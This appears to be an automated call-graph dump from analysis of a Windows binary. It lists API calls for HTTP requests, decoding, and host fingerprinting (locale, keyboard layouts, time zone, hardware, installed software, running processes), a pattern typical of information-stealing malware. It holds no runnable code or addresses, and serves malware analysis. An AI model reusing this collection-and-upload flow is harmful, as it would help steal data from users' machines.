a5a8a0 lstrcpy 14723->14724 14725 a44a29 14724->14725 14726 a5a9b0 4 API calls 14725->14726 14727 a44a48 14726->14727 14728 a5a8a0 lstrcpy 14727->14728 14729 a44a51 14728->14729 14730 a5a9b0 4 API calls 14729->14730 14731 a44a7d 14730->14731 14732 a5a920 3 API calls 14731->14732 14733 a44a84 14732->14733 14734 a5a8a0 lstrcpy 14733->14734 14735 a44a8d 14734->14735 14736 a44aa3 InternetConnectA 14735->14736 14736->14692 14737 a44ad3 HttpOpenRequestA 14736->14737 14739 a44ebe InternetCloseHandle 14737->14739 14740 a44b28 14737->14740 14739->14692 14741 a5a9b0 4 API calls 14740->14741 14742 a44b3c 14741->14742 14743 a5a8a0 lstrcpy 14742->14743 14744 a44b45 14743->14744 14745 a5a920 3 API calls 14744->14745 14746 a44b63 14745->14746 14747 a5a8a0 lstrcpy 14746->14747 14748 a44b6c 14747->14748 14749 a5a9b0 4 API calls 14748->14749 14750 a44b8b 14749->14750 14751 a5a8a0 lstrcpy 14750->14751 14752 a44b94 14751->14752 14753 a5a9b0 4 API calls 14752->14753 14754 a44bb5 14753->14754 14755 a5a8a0 lstrcpy 14754->14755 14756 a44bbe 14755->14756 14757 a5a9b0 4 API calls 14756->14757 14758 a44bde 14757->14758 14759 a5a8a0 lstrcpy 14758->14759 14760 a44be7 14759->14760 14761 a5a9b0 4 API calls 14760->14761 14762 a44c06 14761->14762 14763 a5a8a0 lstrcpy 14762->14763 14764 a44c0f 14763->14764 14765 a5a920 3 API calls 14764->14765 14766 a44c2d 14765->14766 14767 a5a8a0 lstrcpy 14766->14767 14768 a44c36 14767->14768 14769 a5a9b0 4 API calls 14768->14769 14770 a44c55 14769->14770 14771 a5a8a0 lstrcpy 14770->14771 14772 a44c5e 14771->14772 14773 a5a9b0 4 API calls 14772->14773 14774 a44c7d 14773->14774 14775 a5a8a0 lstrcpy 14774->14775 14776 a44c86 14775->14776 14777 a5a920 3 API calls 14776->14777 14778 a44ca4 14777->14778 14779 a5a8a0 lstrcpy 14778->14779 14780 a44cad 14779->14780 14781 a5a9b0 4 API calls 14780->14781 14782 a44ccc 14781->14782 14783 a5a8a0 lstrcpy 14782->14783 14784 a44cd5 14783->14784 14785 a5a9b0 4 API calls 14784->14785 14786 a44cf6 14785->14786 14787 a5a8a0 lstrcpy 14786->14787 14788 a44cff 14787->14788 14789 a5a9b0 4 API calls 14788->14789 14790 a44d1f 14789->14790 14791 a5a8a0 lstrcpy 14790->14791 14792 a44d28 14791->14792 14793 a5a9b0 4 API calls 14792->14793 14794 a44d47 14793->14794 14795 a5a8a0 lstrcpy 14794->14795 14796 a44d50 14795->14796 14797 a5a920 3 API calls 14796->14797 14798 a44d6e 14797->14798 14799 a5a8a0 lstrcpy 14798->14799 14800 a44d77 14799->14800 14801 a5a740 lstrcpy 14800->14801 14802 a44d92 14801->14802 14803 a5a920 3 API calls 14802->14803 14804 a44db3 14803->14804 14805 a5a920 3 API calls 14804->14805 14806 a44dba 14805->14806 14807 a5a8a0 lstrcpy 14806->14807 14808 a44dc6 14807->14808 14809 a44de7 lstrlen 14808->14809 14810 a44dfa 14809->14810 14811 a44e03 lstrlen 14810->14811 15750 a5aad0 14811->15750 14813 a44e13 HttpSendRequestA 14814 a44e32 InternetReadFile 14813->14814 14815 a44e67 InternetCloseHandle 14814->14815 14820 a44e5e 14814->14820 14818 a5a800 14815->14818 14817 a5a9b0 4 API calls 14817->14820 14818->14739 14819 a5a8a0 lstrcpy 14819->14820 14820->14814 14820->14815 14820->14817 14820->14819 15757 a5aad0 14821->15757 14823 a517c4 StrCmpCA 14824 a517cf ExitProcess 14823->14824 14836 a517d7 14823->14836 14825 a519c2 14825->13744 14826 a518ad StrCmpCA 14826->14836 14827 a518cf StrCmpCA 14827->14836 14828 a518f1 StrCmpCA 14828->14836 14829 a51951 StrCmpCA 14829->14836 14830 a51970 StrCmpCA 14830->14836 14831 a51913 StrCmpCA 14831->14836 14832 a51932 StrCmpCA 14832->14836 14833 a5185d StrCmpCA 14833->14836 14834 a5187f StrCmpCA 14834->14836 14835 a5a820 lstrlen lstrcpy 14835->14836 14836->14825 14836->14826 14836->14827 14836->14828 14836->14829 14836->14830 14836->14831 14836->14832 14836->14833 14836->14834 14836->14835 14838 a5a7a0 lstrcpy 14837->14838 14839 a45979 14838->14839 14840 a447b0 2 API calls 14839->14840 14841 a45985 14840->14841 14842 a5a740 lstrcpy 14841->14842 14843 a459ba 14842->14843 14844 a5a740 lstrcpy 14843->14844 14845 a459c7 14844->14845 14846 a5a740 lstrcpy 14845->14846 14847 a459d4 14846->14847 14848 a5a740 lstrcpy 14847->14848 14849 a459e1 14848->14849 14850 a5a740 lstrcpy 14849->14850 14851 a459ee InternetOpenA StrCmpCA 14850->14851 14852 a45a1d 14851->14852 14853 a45fc3 InternetCloseHandle 14852->14853 14854 a58b60 3 API calls 14852->14854 14855 a45fe0 14853->14855 14856 a45a3c 14854->14856 14858 a49ac0 4 API calls 14855->14858 14857 a5a920 3 API calls 14856->14857 14859 a45a4f 14857->14859 14860 a45fe6 14858->14860 14861 a5a8a0 lstrcpy 14859->14861 14862 a5a820 2 API calls 14860->14862 14864 a4601f codecvt 14860->14864 14866 a45a58 14861->14866 14863 a45ffd 14862->14863 14865 a5a9b0 4 API calls 14863->14865 14868 a5a7a0 lstrcpy 14864->14868 14867 a46013 14865->14867 14870 a5a9b0 4 API calls 14866->14870 14869 a5a8a0 lstrcpy 14867->14869 14878 a4604f 14868->14878 14869->14864 14871 a45a82 14870->14871 14872 a5a8a0 lstrcpy 14871->14872 14873 a45a8b 14872->14873 14874 a5a9b0 4 API calls 14873->14874 14875 a45aaa 14874->14875 14876 a5a8a0 lstrcpy 14875->14876 14877 a45ab3 14876->14877 14879 a5a920 3 API calls 14877->14879 14878->13750 14880 a45ad1 14879->14880 14881 a5a8a0 lstrcpy 14880->14881 14882 a45ada 14881->14882 14883 a5a9b0 4 API calls 14882->14883 14884 a45af9 14883->14884 14885 a5a8a0 lstrcpy 14884->14885 14886 a45b02 14885->14886 14887 a5a9b0 4 API calls 14886->14887 14888 a45b21 14887->14888 14889 a5a8a0 lstrcpy 14888->14889 14890 a45b2a 14889->14890 14891 a5a9b0 4 API calls 14890->14891 14892 a45b56 14891->14892 14893 a5a920 3 API calls 14892->14893 14894 a45b5d 14893->14894 14895 a5a8a0 lstrcpy 14894->14895 14896 a45b66 14895->14896 14897 a45b7c InternetConnectA 14896->14897 14897->14853 14898 a45bac HttpOpenRequestA 14897->14898 14900 a45fb6 InternetCloseHandle 14898->14900 14901 a45c0b 14898->14901 14900->14853 14902 a5a9b0 4 API calls 14901->14902 14903 a45c1f 14902->14903 14904 a5a8a0 lstrcpy 14903->14904 14905 a45c28 14904->14905 14906 a5a920 3 API calls 14905->14906 14907 a45c46 14906->14907 14908 a5a8a0 lstrcpy 14907->14908 14909 a45c4f 14908->14909 14910 a5a9b0 4 API calls 14909->14910 14911 a45c6e 14910->14911 14912 a5a8a0 lstrcpy 14911->14912 14913 a45c77 14912->14913 14914 a5a9b0 4 API calls 14913->14914 14915 a45c98 14914->14915 14916 a5a8a0 lstrcpy 14915->14916 14917 a45ca1 14916->14917 14918 a5a9b0 4 API calls 14917->14918 14919 a45cc1 14918->14919 14920 a5a8a0 lstrcpy 14919->14920 14921 a45cca 14920->14921 14922 a5a9b0 4 API calls 14921->14922 14923 a45ce9 14922->14923 14924 a5a8a0 lstrcpy 14923->14924 14925 a45cf2 14924->14925 14926 a5a920 3 API calls 14925->14926 14927 a45d10 14926->14927 14928 a5a8a0 lstrcpy 14927->14928 14929 a45d19 14928->14929 14930 a5a9b0 4 API calls 14929->14930 14931 a45d38 14930->14931 14932 a5a8a0 lstrcpy 14931->14932 14933 a45d41 14932->14933 14934 a5a9b0 4 API calls 14933->14934 14935 a45d60 14934->14935 14936 a5a8a0 lstrcpy 14935->14936 14937 a45d69 14936->14937 14938 a5a920 3 API calls 14937->14938 14939 a45d87 14938->14939 14940 a5a8a0 lstrcpy 14939->14940 14941 a45d90 14940->14941 14942 a5a9b0 4 API calls 14941->14942 14943 a45daf 14942->14943 14944 a5a8a0 lstrcpy 14943->14944 14945 a45db8 14944->14945 14946 a5a9b0 4 API calls 14945->14946 14947 a45dd9 14946->14947 14948 a5a8a0 lstrcpy 14947->14948 14949 a45de2 14948->14949 14950 a5a9b0 4 API calls 14949->14950 14951 a45e02 14950->14951 14952 a5a8a0 lstrcpy 14951->14952 14953 a45e0b 14952->14953 14954 a5a9b0 4 API calls 14953->14954 14955 a45e2a 14954->14955 14956 a5a8a0 lstrcpy 14955->14956 14957 a45e33 14956->14957 14958 a5a920 3 API calls 14957->14958 14959 a45e54 14958->14959 14960 a5a8a0 lstrcpy 14959->14960 14961 a45e5d 14960->14961 14962 a45e70 lstrlen 14961->14962 15758 a5aad0 14962->15758 14964 a45e81 lstrlen GetProcessHeap RtlAllocateHeap 15759 a5aad0 14964->15759 14966 a45eae lstrlen 14967 a45ebe 14966->14967 14968 a45ed7 lstrlen 14967->14968 14969 a45ee7 14968->14969 14970 a45ef0 lstrlen 14969->14970 14971 a45f04 14970->14971 14972 a45f1a lstrlen 14971->14972 15760 a5aad0 14972->15760 14974 a45f2a HttpSendRequestA 14975 a45f35 InternetReadFile 14974->14975 14976 a45f6a InternetCloseHandle 14975->14976 14980 a45f61 14975->14980 14976->14900 14978 a5a9b0 4 API calls 14978->14980 14979 a5a8a0 lstrcpy 14979->14980 14980->14975 14980->14976 14980->14978 14980->14979 14983 a51077 14981->14983 14982 a51151 14982->13752 14983->14982 14984 a5a820 lstrlen lstrcpy 14983->14984 14984->14983 14986 a50db7 14985->14986 14987 a50ea4 StrCmpCA 14986->14987 14988 a50e27 StrCmpCA 14986->14988 14989 a50e67 StrCmpCA 14986->14989 14990 a50f17 14986->14990 14991 a5a820 lstrlen lstrcpy 14986->14991 14987->14986 14988->14986 14989->14986 14990->13760 14991->14986 14993 a50f67 14992->14993 14994 a51044 14993->14994 14995 a50fb2 StrCmpCA 14993->14995 14996 a5a820 lstrlen lstrcpy 14993->14996 14994->13768 14995->14993 14996->14993 14998 a5a740 lstrcpy 14997->14998 14999 a51a26 14998->14999 15000 a5a9b0 4 API calls 14999->15000 15001 a51a37 15000->15001 15002 a5a8a0 lstrcpy 15001->15002 15003 a51a40 15002->15003 15004 a5a9b0 4 API calls 15003->15004 15005 a51a5b 15004->15005 15006 a5a8a0 lstrcpy 15005->15006 15007 a51a64 15006->15007 15008 a5a9b0 4 API calls 15007->15008 15009 a51a7d 15008->15009 15010 a5a8a0 lstrcpy 15009->15010 15011 a51a86 15010->15011 15012 a5a9b0 4 API calls 15011->15012 15013 a51aa1 15012->15013 15014 a5a8a0 lstrcpy 15013->15014 15015 a51aaa 15014->15015 15016 a5a9b0 4 API calls 15015->15016 15017 a51ac3 15016->15017 15018 a5a8a0 lstrcpy 15017->15018 15019 a51acc 15018->15019 15020 a5a9b0 4 API calls 15019->15020 15021 a51ae7 15020->15021 15022 a5a8a0 lstrcpy 15021->15022 15023 a51af0 15022->15023 15024 a5a9b0 4 API calls 15023->15024 15025 a51b09 15024->15025 15026 a5a8a0 lstrcpy 15025->15026 15027 a51b12 15026->15027 15028 a5a9b0 4 API calls 15027->15028 15029 a51b2d 15028->15029 15030 a5a8a0 lstrcpy 15029->15030 15031 a51b36 15030->15031 15032 a5a9b0 4 API calls 15031->15032 15033 a51b4f 15032->15033 15034 a5a8a0 lstrcpy 15033->15034 15035 a51b58 15034->15035 15036 a5a9b0 4 API calls 15035->15036 15037 a51b76 15036->15037 15038 a5a8a0 lstrcpy 15037->15038 15039 a51b7f 15038->15039 15040 a57500 6 API calls 15039->15040 15041 a51b96 15040->15041 15042 a5a920 3 API calls 15041->15042 15043 a51ba9 15042->15043 15044 a5a8a0 lstrcpy 15043->15044 15045 a51bb2 15044->15045 15046 a5a9b0 4 API calls 15045->15046 15047 a51bdc 15046->15047 15048 a5a8a0 lstrcpy 15047->15048 15049 a51be5 15048->15049 15050 a5a9b0 4 API calls 15049->15050 15051 a51c05 15050->15051 15052 a5a8a0 lstrcpy 15051->15052 15053 a51c0e 15052->15053 15761 a57690 GetProcessHeap RtlAllocateHeap 15053->15761 15056 a5a9b0 4 API calls 15057 a51c2e 15056->15057 15058 a5a8a0 lstrcpy 15057->15058 15059 a51c37 15058->15059 15060 a5a9b0 4 API calls 15059->15060 15061 a51c56 15060->15061 15062 a5a8a0 lstrcpy 15061->15062 15063 a51c5f 15062->15063 15064 a5a9b0 4 API calls 15063->15064 15065 a51c80 15064->15065 15066 a5a8a0 lstrcpy 15065->15066 15067 a51c89 15066->15067 15768 a577c0 GetCurrentProcess IsWow64Process 15067->15768 15070 a5a9b0 4 API calls 15071 a51ca9 15070->15071 15072 a5a8a0 lstrcpy 15071->15072 15073 a51cb2 15072->15073 15074 a5a9b0 4 API calls 15073->15074 15075 a51cd1 15074->15075 15076 a5a8a0 lstrcpy 15075->15076 15077 a51cda 15076->15077 15078 a5a9b0 4 API calls 15077->15078 15079 a51cfb 15078->15079 15080 a5a8a0 lstrcpy 15079->15080 15081 a51d04 15080->15081 15082 a57850 3 API calls 15081->15082 15083 a51d14 15082->15083 15084 a5a9b0 4 API calls 15083->15084 15085 a51d24 15084->15085 15086 a5a8a0 lstrcpy 15085->15086 15087 a51d2d 15086->15087 15088 a5a9b0 4 API calls 15087->15088 15089 a51d4c 15088->15089 15090 a5a8a0 lstrcpy 15089->15090 15091 a51d55 15090->15091 15092 a5a9b0 4 API calls 15091->15092 15093 a51d75 15092->15093 15094 a5a8a0 lstrcpy 15093->15094 15095 a51d7e 15094->15095 15096 a578e0 3 API calls 15095->15096 15097 a51d8e 15096->15097 15098 a5a9b0 4 API calls 15097->15098 15099 a51d9e 15098->15099 15100 a5a8a0 lstrcpy 15099->15100 15101 a51da7 15100->15101 15102 a5a9b0 4 API calls 15101->15102 15103 a51dc6 15102->15103 15104 a5a8a0 lstrcpy 15103->15104 15105 a51dcf 15104->15105 15106 a5a9b0 4 API calls 15105->15106 15107 a51df0 15106->15107 15108 a5a8a0 lstrcpy 15107->15108 15109 a51df9 15108->15109 15770 a57980 GetProcessHeap RtlAllocateHeap GetLocalTime wsprintfA 15109->15770 15112 a5a9b0 4 API calls 15113 a51e19 15112->15113 15114 a5a8a0 lstrcpy 15113->15114 15115 a51e22 15114->15115 15116 a5a9b0 4 API calls 15115->15116 15117 a51e41 15116->15117 15118 a5a8a0 lstrcpy 15117->15118 15119 a51e4a 15118->15119 15120 a5a9b0 4 API calls 15119->15120 15121 a51e6b 15120->15121 15122 a5a8a0 lstrcpy 15121->15122 15123 a51e74 15122->15123 15772 a57a30 GetProcessHeap RtlAllocateHeap GetTimeZoneInformation 15123->15772 15126 a5a9b0 4 API calls 15127 a51e94 15126->15127 15128 a5a8a0 lstrcpy 15127->15128 15129 a51e9d 15128->15129 15130 a5a9b0 4 API calls 15129->15130 15131 a51ebc 15130->15131 15132 a5a8a0 lstrcpy 15131->15132 15133 a51ec5 15132->15133 15134 a5a9b0 4 API calls 15133->15134 15135 a51ee5 15134->15135 15136 a5a8a0 lstrcpy 15135->15136 15137 a51eee 15136->15137 15775 a57b00 GetUserDefaultLocaleName 15137->15775 15140 a5a9b0 4 API calls 15141 a51f0e 15140->15141 15142 a5a8a0 lstrcpy 15141->15142 15143 a51f17 15142->15143 15144 a5a9b0 4 API calls 15143->15144 15145 a51f36 15144->15145 15146 a5a8a0 lstrcpy 15145->15146 15147 a51f3f 15146->15147 15148 a5a9b0 4 API calls 15147->15148 15149 a51f60 15148->15149 15150 a5a8a0 lstrcpy 15149->15150 15151 a51f69 15150->15151 15779 a57b90 15151->15779 15153 a51f80 15154 a5a920 3 API calls 15153->15154 15155 a51f93 15154->15155 15156 a5a8a0 lstrcpy 15155->15156 15157 a51f9c 15156->15157 15158 a5a9b0 4 API calls 15157->15158 15159 a51fc6 15158->15159 15160 a5a8a0 lstrcpy 15159->15160 15161 a51fcf 15160->15161 15162 a5a9b0 4 API calls 15161->15162 15163 a51fef 15162->15163 15164 a5a8a0 lstrcpy 15163->15164 15165 a51ff8 15164->15165 15791 a57d80 GetSystemPowerStatus 15165->15791 15168 a5a9b0 4 API calls 15169 a52018 15168->15169 15170 a5a8a0 lstrcpy 15169->15170 15171 a52021 15170->15171 15172 a5a9b0 4 API calls 15171->15172 15173 a52040 15172->15173 15174 a5a8a0 lstrcpy 15173->15174 15175 a52049 15174->15175 15176 a5a9b0 4 API calls 15175->15176 15177 a5206a 15176->15177 15178 a5a8a0 lstrcpy 15177->15178 15179 a52073 15178->15179 15180 a5207e GetCurrentProcessId 15179->15180 15793 a59470 OpenProcess 15180->15793 15183 a5a920 3 API calls 15184 a520a4 15183->15184 15185 a5a8a0 lstrcpy 15184->15185 15186 a520ad 15185->15186 15187 a5a9b0 4 API calls 15186->15187 15188 a520d7 15187->15188 15189 a5a8a0 lstrcpy 15188->15189 15190 a520e0 15189->15190 15191 a5a9b0 4 API calls 15190->15191 15192 a52100 15191->15192 15193 a5a8a0 lstrcpy 15192->15193 15194 a52109 15193->15194 15798 a57e00 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 15194->15798 15197 a5a9b0 4 API calls 15198 a52129 15197->15198 15199 a5a8a0 lstrcpy 15198->15199 15200 a52132 15199->15200 15201 a5a9b0 4 API calls 15200->15201 15202 a52151 15201->15202 15203 a5a8a0 lstrcpy 15202->15203 15204 a5215a 15203->15204 15205 a5a9b0 4 API calls 15204->15205 15206 a5217b 15205->15206 15207 a5a8a0 lstrcpy 15206->15207 15208 a52184 15207->15208 15802 a57f60 15208->15802 15211 a5a9b0 4 API calls 15212 a521a4 15211->15212 15213 a5a8a0 lstrcpy 15212->15213 15214 a521ad 15213->15214 15215 a5a9b0 4 API calls 15214->15215 15216 a521cc 15215->15216 15217 a5a8a0 lstrcpy 15216->15217 15218 a521d5 15217->15218 15219 a5a9b0 4 API calls 15218->15219 15220 a521f6 15219->15220 15221 a5a8a0 lstrcpy 15220->15221 15222 a521ff 15221->15222 15815 a57ed0 GetSystemInfo wsprintfA 15222->15815 15225 a5a9b0 4 API calls 15226 a5221f 15225->15226 15227 a5a8a0 lstrcpy 15226->15227 15228 a52228 15227->15228 15229 a5a9b0 4 API calls 15228->15229 15230 a52247 15229->15230 15231 a5a8a0 lstrcpy 15230->15231 15232 a52250 15231->15232 15233 a5a9b0 4 API calls 15232->15233 15234 a52270 15233->15234 15235 a5a8a0 lstrcpy 15234->15235 15236 a52279 15235->15236 15817 a58100 GetProcessHeap RtlAllocateHeap 15236->15817 15239 a5a9b0 4 API calls 15240 a52299 15239->15240 15241 a5a8a0 lstrcpy 15240->15241 15242 a522a2 15241->15242 15243 a5a9b0 4 API calls 15242->15243 15244 a522c1 15243->15244 15245 a5a8a0 lstrcpy 15244->15245 15246 a522ca 15245->15246 15247 a5a9b0 4 API calls 15246->15247 15248 a522eb 15247->15248 15249 a5a8a0 lstrcpy 15248->15249 15250 a522f4 15249->15250 15823 a587c0 15250->15823 15253 a5a920 3 API calls 15254 a5231e 15253->15254 15255 a5a8a0 lstrcpy 15254->15255 15256 a52327 15255->15256 15257 a5a9b0 4 API calls 15256->15257 15258 a52351 15257->15258 15259 a5a8a0 lstrcpy 15258->15259 15260 a5235a 15259->15260 15261 a5a9b0 4 API calls 15260->15261 15262 a5237a 15261->15262 15263 a5a8a0 lstrcpy 15262->15263 15264 a52383 15263->15264 15265 a5a9b0 4 API calls 15264->15265 15266 a523a2 15265->15266 15267 a5a8a0 lstrcpy 15266->15267 15268 a523ab 15267->15268 15828 a581f0 15268->15828 15270 a523c2 15271 a5a920 3 API calls 15270->15271 15272 a523d5 15271->15272 15273 a5a8a0 lstrcpy 15272->15273 15274 a523de 15273->15274 15275 a5a9b0 4 API calls 15274->15275 15276 a5240a 15275->15276 15277 a5a8a0 lstrcpy 15276->15277 15278 a52413 15277->15278 15279 a5a9b0 4 API calls 15278->15279 15280 a52432 15279->15280 15281 a5a8a0 lstrcpy 15280->15281 15282 a5243b 15281->15282 15283 a5a9b0 4 API calls 15282->15283 15284 a5245c 15283->15284 15285 a5a8a0 lstrcpy 15284->15285 15286 a52465 15285->15286 15287 a5a9b0 4 API calls 15286->15287 15288 a52484 15287->15288 15289 a5a8a0 lstrcpy 15288->15289 15290 a5248d 15289->15290 15291 a5a9b0 4 API calls 15290->15291 15292 a524ae 15291->15292 15293 a5a8a0 lstrcpy 15292->15293 15294 a524b7 15293->15294 15836 a58320 15294->15836 15296 a524d3 15297 a5a920 3 API calls 15296->15297 15298 a524e6 15297->15298 15299 a5a8a0 lstrcpy 15298->15299 15300 a524ef 15299->15300 15301 a5a9b0 4 API calls 15300->15301 15302 a52519 15301->15302 15303 a5a8a0 lstrcpy 15302->15303 15304 a52522 15303->15304 15305 a5a9b0 4 API calls 15304->15305 15306 a52543 15305->15306 15307 a5a8a0 lstrcpy 15306->15307 15308 a5254c 15307->15308 15309 a58320 17 API calls 15308->15309 15310 a52568 15309->15310 15311 a5a920 3 API calls 15310->15311 15312 a5257b 15311->15312 15313 a5a8a0 lstrcpy 15312->15313 15314 a52584 15313->15314 15315 a5a9b0 4 API calls 15314->15315 15316 a525ae 15315->15316 15317 a5a8a0 lstrcpy 15316->15317 15318 a525b7 15317->15318 15319 a5a9b0 4 API calls 15318->15319 15320 a525d6 15319->15320 15321 a5a8a0 lstrcpy 15320->15321 15322 a525df 15321->15322 15323 a5a9b0 4 API calls 15322->15323 15324 a52600 15323->15324 15325 a5a8a0 lstrcpy 15324->15325 15326 a52609 15325->15326 15872 a58680 15326->15872 15328 a52620 15329 a5a920 3 API calls 15328->15329 15330 a52633 15329->15330 15331 a5a8a0 lstrcpy 15330->15331 15332 a5263c 15331->15332 15333 a5265a lstrlen 15332->15333 15334 a5266a 15333->15334 15335 a5a740 lstrcpy 15334->15335 15336 a5267c 15335->15336 15337 a41590 lstrcpy 15336->15337 15338 a5268d 15337->15338 15882 a55190 15338->15882 15340 a52699 15340->13772 16070 a5aad0 15341->16070 15343 a45009 InternetOpenUrlA 15344 a45021 15343->15344 15345 a450a0 InternetCloseHandle InternetCloseHandle 15344->15345 15346 a4502a InternetReadFile 15344->15346 15347 a450ec 15345->15347 15346->15344 15347->13776 16071 a498d0 15348->16071 15350 a50759 15351 a5077d 15350->15351 15352 a50a38 15350->15352 15354 a50799 StrCmpCA 15351->15354 15353 a41590 lstrcpy 15352->15353 15355 a50a49 15353->15355 15356 a50843 15354->15356 15357 a507a8 15354->15357 16247 a50250 15355->16247 15361 a50865 StrCmpCA 15356->15361 15359 a5a7a0 lstrcpy 15357->15359 15362 a507c3 15359->15362 15363 a50874 15361->15363 15400 a5096b 15361->15400 15364 a41590 lstrcpy 15362->15364 15365 a5a740 lstrcpy 15363->15365 15366 a5080c 15364->15366 15368 a50881 15365->15368 15369 a5a7a0 lstrcpy 15366->15369 15367 a5099c StrCmpCA 15370 a509ab 15367->15370 15389 a50a2d 15367->15389 15371 a5a9b0 4 API calls 15368->15371 15372 a50823 15369->15372 15373 a41590 lstrcpy 15370->15373 15374 a508ac 15371->15374 15375 a5a7a0 lstrcpy 15372->15375 15376 a509f4 15373->15376 15377 a5a920 3 API calls 15374->15377 15378 a5083e 15375->15378 15379 a5a7a0 lstrcpy 15376->15379 15380 a508b3 15377->15380 16074 a4fb00 15378->16074 15382 a50a0d 15379->15382 15383 a5a9b0 4 API calls 15380->15383 15384 a5a7a0 lstrcpy 15382->15384 15385 a508ba 15383->15385 15386 a50a28 15384->15386 15387 a5a8a0 lstrcpy 15385->15387 15389->13780 15400->15367 15722 a5a7a0 lstrcpy 15721->15722 15723 a41683 15722->15723 15724 a5a7a0 lstrcpy 15723->15724 15725 a41695 15724->15725 15726 a5a7a0 lstrcpy 15725->15726 15727 a416a7 15726->15727 15728 a5a7a0 lstrcpy 15727->15728 15729 a415a3 15728->15729 15729->14603 15731 a447c6 15730->15731 15732 a44838 lstrlen 15731->15732 15756 a5aad0 15732->15756 15734 a44848 InternetCrackUrlA 15735 a44867 15734->15735 15735->14680 15737 a5a740 lstrcpy 15736->15737 15738 a58b74 15737->15738 15739 a5a740 lstrcpy 15738->15739 15740 a58b82 GetSystemTime 15739->15740 15741 a58b99 15740->15741 15742 a5a7a0 lstrcpy 15741->15742 15743 a58bfc 15742->15743 15743->14695 15746 a5a931 15744->15746 15745 a5a988 15747 a5a7a0 lstrcpy 15745->15747 15746->15745 15748 a5a968 lstrcpy lstrcat 15746->15748 15749 a5a994 15747->15749 15748->15745 15749->14698 15750->14813 15752 a49af9 LocalAlloc 15751->15752 15753 a44eee 15751->15753 15752->15753 15754 a49b14 CryptStringToBinaryA 15752->15754 15753->14701 15753->14704 15754->15753 15755 a49b39 LocalFree 15754->15755 15755->15753 15756->15734 15757->14823 15758->14964 15759->14966 15760->14974 15889 a577a0 15761->15889 15764 a576c6 RegOpenKeyExA 15766 a57704 RegCloseKey 15764->15766 15767 a576e7 RegQueryValueExA 15764->15767 15765 a51c1e 15765->15056 15766->15765 15767->15766 15769 a51c99 15768->15769 15769->15070 15771 a51e09 15770->15771 15771->15112 15773 a51e84 15772->15773 15774 a57a9a wsprintfA 15772->15774 15773->15126 15774->15773 15776 a57b4d 15775->15776 15778 a51efe 15775->15778 15896 a58d20 LocalAlloc CharToOemW 15776->15896 15778->15140 15780 a5a740 lstrcpy 15779->15780 15781 a57bcc GetKeyboardLayoutList LocalAlloc GetKeyboardLayoutList 15780->15781 15788 a57c25 15781->15788 15782 a57c46 GetLocaleInfoA 15782->15788 15783 a57d18 15784 a57d1e LocalFree 15783->15784 15785 a57d28 15783->15785 15784->15785 15787 a5a7a0 lstrcpy 15785->15787 15786 a5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15786->15788 15790 a57d37 15787->15790 15788->15782 15788->15783 15788->15786 15789 a5a8a0 lstrcpy 15788->15789 15789->15788 15790->15153 15792 a52008 15791->15792 15792->15168 15794 a594b5 15793->15794 15795 a59493 GetModuleFileNameExA CloseHandle 15793->15795 15796 a5a740 lstrcpy 15794->15796 15795->15794 15797 a52091 15796->15797 15797->15183 15799 a57e68 RegQueryValueExA 15798->15799 15801 a52119 15798->15801 15800 a57e8e RegCloseKey 15799->15800 15800->15801 15801->15197 15803 a57fb9 GetLogicalProcessorInformationEx 15802->15803 15804 a57fd8 GetLastError 15803->15804 15810 a58029 15803->15810 15805 a58022 15804->15805 15814 a57fe3 15804->15814 15807 a52194 15805->15807 15809 a589f0 2 API calls 15805->15809 15807->15211 15809->15807 15811 a589f0 2 API calls 15810->15811 15812 a5807b 15811->15812 15812->15805 15813 a58084 wsprintfA 15812->15813 15813->15807 15814->15803 15814->15807 15897 a589f0 15814->15897 15900 a58a10 GetProcessHeap RtlAllocateHeap 15814->15900 15816 a5220f 15815->15816 15816->15225 15818 a589b0 15817->15818 15819 a5814d GlobalMemoryStatusEx 15818->15819 15822 a58163 __aulldiv 15819->15822 15820 a5819b wsprintfA 15821 a52289 15820->15821 15821->15239 15822->15820 15824 a587fb GetProcessHeap RtlAllocateHeap wsprintfA 15823->15824 15826 a5a740 lstrcpy 15824->15826 15827 a5230b 15826->15827 15827->15253 15829 a5a740 lstrcpy 15828->15829 15833 a58229 15829->15833 15830 a58263 15832 a5a7a0 lstrcpy 15830->15832 15831 a5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15831->15833 15834 a582dc 15832->15834 15833->15830 15833->15831 15835 a5a8a0 lstrcpy 15833->15835 15834->15270 15835->15833 15837 a5a740 lstrcpy 15836->15837 15838 a5835c RegOpenKeyExA 15837->15838 15839 a583d0 15838->15839 15840 a583ae 15838->15840 15842 a58613 RegCloseKey 15839->15842 15843 a583f8 RegEnumKeyExA 15839->15843 15841 a5a7a0 lstrcpy 15840->15841 15852 a583bd 15841->15852 15846 a5a7a0 lstrcpy 15842->15846 15844 a5843f wsprintfA RegOpenKeyExA 15843->15844 15845 a5860e 15843->15845 15847 a58485 RegCloseKey RegCloseKey 15844->15847 15848 a584c1 RegQueryValueExA 15844->15848 15845->15842 15846->15852 15849 a5a7a0 lstrcpy 15847->15849 15850 a58601 RegCloseKey 15848->15850 15851 a584fa lstrlen 15848->15851 15849->15852 15850->15845 15851->15850 15853 a58510 15851->15853 15852->15296 15854 a5a9b0 4 API calls 15853->15854 15855 a58527 15854->15855 15856 a5a8a0 lstrcpy 15855->15856 15857 a58533 15856->15857 15858 a5a9b0 4 API calls 15857->15858 15859 a58557 15858->15859 15860 a5a8a0 lstrcpy 15859->15860 15861 a58563 15860->15861 15862 a5856e RegQueryValueExA 15861->15862 15862->15850 15863 a585a3 15862->15863 15864 a5a9b0 4 API calls 15863->15864 15865 a585ba 15864->15865 15866 a5a8a0 lstrcpy 15865->15866 15867 a585c6 15866->15867 15868 a5a9b0 4 API calls 15867->15868 15869 a585ea 15868->15869 15870 a5a8a0 lstrcpy 15869->15870 15871 a585f6 15870->15871 15871->15850 15873 a5a740 lstrcpy 15872->15873 15874 a586bc CreateToolhelp32Snapshot Process32First 15873->15874 15875 a5875d CloseHandle 15874->15875 15876 a586e8 Process32Next 15874->15876 15877 a5a7a0 lstrcpy 15875->15877 15876->15875 15881 a586fd 15876->15881 15879 a58776 15877->15879 15878 a5a8a0 lstrcpy 15878->15881 15879->15328 15880 a5a9b0 lstrcpy lstrlen lstrcpy lstrcat 15880->15881 15881->15876 15881->15878 15881->15880 15883 a5a7a0 lstrcpy 15882->15883 15884 a551b5 15883->15884 15885 a41590 lstrcpy 15884->15885 15886 a551c6 15885->15886 15901 a45100 15886->15901 15888 a551cf 15888->15340 15892 a57720 GetProcessHeap RtlAllocateHeap RegOpenKeyExA 